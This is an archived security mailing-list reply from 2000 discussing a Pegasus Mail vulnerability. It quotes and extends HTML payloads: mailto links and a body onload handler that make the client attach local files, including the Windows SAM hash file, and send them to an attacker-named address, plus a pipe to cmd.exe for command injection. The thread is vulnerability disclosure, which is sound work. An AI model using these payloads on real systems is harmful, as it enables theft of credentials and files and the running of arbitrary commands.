|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Pegasus Mail
From: H D Moore (hdm
SECUREAUSTIN.COM)Date: Mon Oct 02 2000 - 22:44:35 CDT
- Next message: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
- Previous message: Helmut Springer: "Re: Pegasus Mail"
- In reply to: Imran Ghory: "Pegasus Mail"
- Next in thread: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
- Reply: H D Moore: "Re: Pegasus Mail"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Imran Ghory wrote:
>
> When using the following html,
>
> <a href="mailto:hackerhakersite.com -F c:\test.txt"> Click
> here</a>
>
> When the user clicks on "Click here" Pegasus mail will
> automatically creates a message which has a copy of the file
> "c:\test.txt" and is addressed to "hackerhakersite.com" and
> queues it ready to be sent without any further user intervention.
>
> If instead of "hackerhakersite.com" we have a local user,
> "hacker" the message won't be queued but just sent immediately.
>
> As inorder to have files stolen the user would have to click on the
> dubious looking link, is this security risk serious ?
YES, the use doesnt even need to click on the link though.
Imagine a page like:
<body onload="mailto:hackerhakersite.com -F c:\winnt\repair\sam._">
There goes your user account/hash database. Have you tested to see what
pipes do?
Example:
<body onload="mailto:hackerhakersite.com -F c:\winnt\repair\sam._ |
cmd.exe /c echo I can any command I want">
- Next message: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
- Previous message: Helmut Springer: "Re: Pegasus Mail"
- In reply to: Imran Ghory: "Pegasus Mail"
- Next in thread: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
- Reply: H D Moore: "Re: Pegasus Mail"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]